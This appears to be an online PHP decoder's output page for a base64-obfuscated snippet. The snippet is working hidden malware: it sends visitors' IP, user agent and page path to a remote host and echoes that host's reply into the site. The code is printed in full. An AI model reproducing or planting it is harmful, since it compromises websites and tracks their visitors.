Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $GLOBALS['_aaf_']=Array(base64_decode('c' .'3R' .'y' .'dG9sb3' .'dl' .'c' .'g=' ...

Decoded Output download

<?php 
 
$GLOBALS['_aaf_']=Array(base64_decode('c' .'3R' .'y' .'dG9sb3' .'dl' .'c' .'g=' .'='),base64_decode('c3Ryc3Ry'),base64_decode('c' .'3Ry' .'c3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3Ryc3Ry'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('c3Ry' .'c3Ry'),base64_decode('c3Ryc3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3R' .'yc3Ry'),base64_decode('YmFzZ' .'TY0X2' .'RlY29kZQ=='),base64_decode('dXJ' .'sZW5' .'jb2R' .'l'),base64_decode('' .'dXJs' .'ZW' .'5j' .'b2' .'Rl'),base64_decode('dXJ' .'sZW5j' .'b2Rl'),base64_decode('dXJsZW' .'5j' .'b2Rl'),base64_decode('Y' .'3Vyb' .'F9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRv' .'cHQ='),base64_decode('' .'Y3Vyb' .'F9zZX' .'RvcH' .'Q='),base64_decode('Y3VybF9' .'le' .'G' .'Vj'),base64_decode('Y' .'3VybF9jbG9z' .'ZQ' .'==')); 
 
function aaf($i){$a=Array('HTTP_USER_AGENT',"",'google','yahoo','baidu','msn','opera','chrome','bing','safari','bot','HTTP_REFERER',"",'REMOTE_ADDR','HTTP_HOST','aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRHL3N0YXQucGhw','?ip=','REMOTE_ADDR','&useragent=','&domainname=','HTTP_HOST','&fullpath=','REQUEST_URI','&check=','look',"O"," ");return $a[$i];}; 
 
if(!isset($aafv_0)){global $aafv_0;$aafv_0=round(0+1);$aafv_1=$GLOBALS['_aaf_'][0]($_SERVER[aaf(0)]);$aafv_2=NULL;$aafv_3=aaf(1);if(($GLOBALS['_aaf_'][1]($aafv_1,aaf(2))== false)&&($GLOBALS['_aaf_'][2]($aafv_1,aaf(3))== false)&&($GLOBALS['_aaf_'][3]($aafv_1,aaf(4))== false)&&($GLOBALS['_aaf_'][4]($aafv_1,aaf(5))== false)&&($GLOBALS['_aaf_'][5]($aafv_1,aaf(6))== false)&&($GLOBALS['_aaf_'][6]($aafv_1,aaf(7))== false)&&($GLOBALS['_aaf_'][7]($aafv_1,aaf(8))== false)&&($GLOBALS['_aaf_'][8]($aafv_1,aaf(9))== false)&&($GLOBALS['_aaf_'][9]($aafv_1,aaf(10))== false)&&$_SERVER[aaf(11)]!=aaf(12)){if(isset($_SERVER[aaf(13)])== true && isset($_SERVER[aaf(14)])== true){$aafv_3=$GLOBALS['_aaf_'][10](aaf(15)) .aaf(16) .$GLOBALS['_aaf_'][11]($_SERVER[aaf(17)]) .aaf(18) .$GLOBALS['_aaf_'][12]($aafv_1) .aaf(19) .$GLOBALS['_aaf_'][13]($_SERVER[aaf(20)]) .aaf(21) .$GLOBALS['_aaf_'][14]($_SERVER[aaf(22)]) .aaf(23) .isset($_GET[aaf(24)]);$aafv_2=$GLOBALS['_aaf_'][15]($aafv_3);}}if($aafv_2 !== NULL){$GLOBALS['_aaf_'][16]($aafv_2,CURLOPT_RETURNTRANSFER,round(0+1));$GLOBALS['_aaf_'][17]($aafv_2,CURLOPT_TIMEOUT,round(0+6));$aafv_4=@$GLOBALS['_aaf_'][18]($aafv_2);if($aafv_4[round(0)]==aaf(25)){$aafv_4[round(0)]=aaf(26);echo $aafv_4;}$GLOBALS['_aaf_'][19]($aafv_2);}}; 
?>

Did this file decode correctly?

Original Code

<?php

$GLOBALS['_aaf_']=Array(base64_decode('c' .'3R' .'y' .'dG9sb3' .'dl' .'c' .'g=' .'='),base64_decode('c3Ryc3Ry'),base64_decode('c' .'3Ry' .'c3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3Ryc3Ry'),base64_decode('c3Ryc3' .'R' .'y'),base64_decode('c3Ry' .'c3Ry'),base64_decode('c3Ryc3Ry'),base64_decode('' .'c3Ryc3' .'Ry'),base64_decode('c3R' .'yc3Ry'),base64_decode('YmFzZ' .'TY0X2' .'RlY29kZQ=='),base64_decode('dXJ' .'sZW5' .'jb2R' .'l'),base64_decode('' .'dXJs' .'ZW' .'5j' .'b2' .'Rl'),base64_decode('dXJ' .'sZW5j' .'b2Rl'),base64_decode('dXJsZW' .'5j' .'b2Rl'),base64_decode('Y' .'3Vyb' .'F9pbml' .'0'),base64_decode('Y3VybF9z' .'ZXRv' .'cHQ='),base64_decode('' .'Y3Vyb' .'F9zZX' .'RvcH' .'Q='),base64_decode('Y3VybF9' .'le' .'G' .'Vj'),base64_decode('Y' .'3VybF9jbG9z' .'ZQ' .'=='));

function aaf($i){$a=Array('HTTP_USER_AGENT',"",'google','yahoo','baidu','msn','opera','chrome','bing','safari','bot','HTTP_REFERER',"",'REMOTE_ADDR','HTTP_HOST','aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRHL3N0YXQucGhw','?ip=','REMOTE_ADDR','&useragent=','&domainname=','HTTP_HOST','&fullpath=','REQUEST_URI','&check=','look',"O"," ");return $a[$i];};

if(!isset($aafv_0)){global $aafv_0;$aafv_0=round(0+1);$aafv_1=$GLOBALS['_aaf_'][0]($_SERVER[aaf(0)]);$aafv_2=NULL;$aafv_3=aaf(1);if(($GLOBALS['_aaf_'][1]($aafv_1,aaf(2))== false)&&($GLOBALS['_aaf_'][2]($aafv_1,aaf(3))== false)&&($GLOBALS['_aaf_'][3]($aafv_1,aaf(4))== false)&&($GLOBALS['_aaf_'][4]($aafv_1,aaf(5))== false)&&($GLOBALS['_aaf_'][5]($aafv_1,aaf(6))== false)&&($GLOBALS['_aaf_'][6]($aafv_1,aaf(7))== false)&&($GLOBALS['_aaf_'][7]($aafv_1,aaf(8))== false)&&($GLOBALS['_aaf_'][8]($aafv_1,aaf(9))== false)&&($GLOBALS['_aaf_'][9]($aafv_1,aaf(10))== false)&&$_SERVER[aaf(11)]!=aaf(12)){if(isset($_SERVER[aaf(13)])== true && isset($_SERVER[aaf(14)])== true){$aafv_3=$GLOBALS['_aaf_'][10](aaf(15)) .aaf(16) .$GLOBALS['_aaf_'][11]($_SERVER[aaf(17)]) .aaf(18) .$GLOBALS['_aaf_'][12]($aafv_1) .aaf(19) .$GLOBALS['_aaf_'][13]($_SERVER[aaf(20)]) .aaf(21) .$GLOBALS['_aaf_'][14]($_SERVER[aaf(22)]) .aaf(23) .isset($_GET[aaf(24)]);$aafv_2=$GLOBALS['_aaf_'][15]($aafv_3);}}if($aafv_2 !== NULL){$GLOBALS['_aaf_'][16]($aafv_2,CURLOPT_RETURNTRANSFER,round(0+1));$GLOBALS['_aaf_'][17]($aafv_2,CURLOPT_TIMEOUT,round(0+6));$aafv_4=@$GLOBALS['_aaf_'][18]($aafv_2);if($aafv_4[round(0)]==aaf(25)){$aafv_4[round(0)]=aaf(26);echo $aafv_4;}$GLOBALS['_aaf_'][19]($aafv_2);}};
?>

Function Calls

aaf 1
round 1
base64_decode 40

Variables

$a [{'key': 0, 'value': 'HTTP_USER_AGENT'}, {'key': 1, 'value': ''}, {'key': 2, 'value': 'google'}, {'key': 3, 'value': 'yahoo'}, {'key': 4, 'value': 'baidu'}, {'key': 5, 'value': 'msn'}, {'key': 6, 'value': 'opera'}, {'key': 7, 'value': 'chrome'}, {'key': 8, 'value': 'bing'}, {'key': 9, 'value': 'safari'}, {'key': 10, 'value': 'bot'}, {'key': 11, 'value': 'HTTP_REFERER'}, {'key': 12, 'value': ''}, {'key': 13, 'value': 'REMOTE_ADDR'}, {'key': 14, 'value': 'HTTP_HOST'}, {'key': 15, 'value': 'aHR0cDovL2dsb2JhbGJyb3dzZXJzdGF0aXN0aWMuY29tL3N0YXRHL3N0YXQucGhw'}, {'key': 16, 'value': '?ip='}, {'key': 17, 'value': 'REMOTE_ADDR'}, {'key': 18, 'value': '&useragent='}, {'key': 19, 'value': '&domainname='}, {'key': 20, 'value': 'HTTP_HOST'}, {'key': 21, 'value': '&fullpath='}, {'key': 22, 'value': 'REQUEST_URI'}, {'key': 23, 'value': '&check='}, {'key': 24, 'value': 'look'}, {'key': 25, 'value': 'O'}, {'key': 26, 'value': ' '}]
$i 0
$_aaf_ [{'key': 0, 'value': 'strtolower'}, {'key': 1, 'value': 'strstr'}, {'key': 2, 'value': 'strstr'}, {'key': 3, 'value': 'strstr'}, {'key': 4, 'value': 'strstr'}, {'key': 5, 'value': 'strstr'}, {'key': 6, 'value': 'strstr'}, {'key': 7, 'value': 'strstr'}, {'key': 8, 'value': 'strstr'}, {'key': 9, 'value': 'strstr'}, {'key': 10, 'value': 'base64_decode'}, {'key': 11, 'value': 'urlencode'}, {'key': 12, 'value': 'urlencode'}, {'key': 13, 'value': 'urlencode'}, {'key': 14, 'value': 'urlencode'}, {'key': 15, 'value': 'curl_init'}, {'key': 16, 'value': 'curl_setopt'}, {'key': 17, 'value': 'curl_setopt'}, {'key': 18, 'value': 'curl_exec'}, {'key': 19, 'value': 'curl_close'}]
$aafv_0 1

Stats

MD5 64c75006b97f08ebb7670a216bde0674
Eval Count 0
Decode Time 313 ms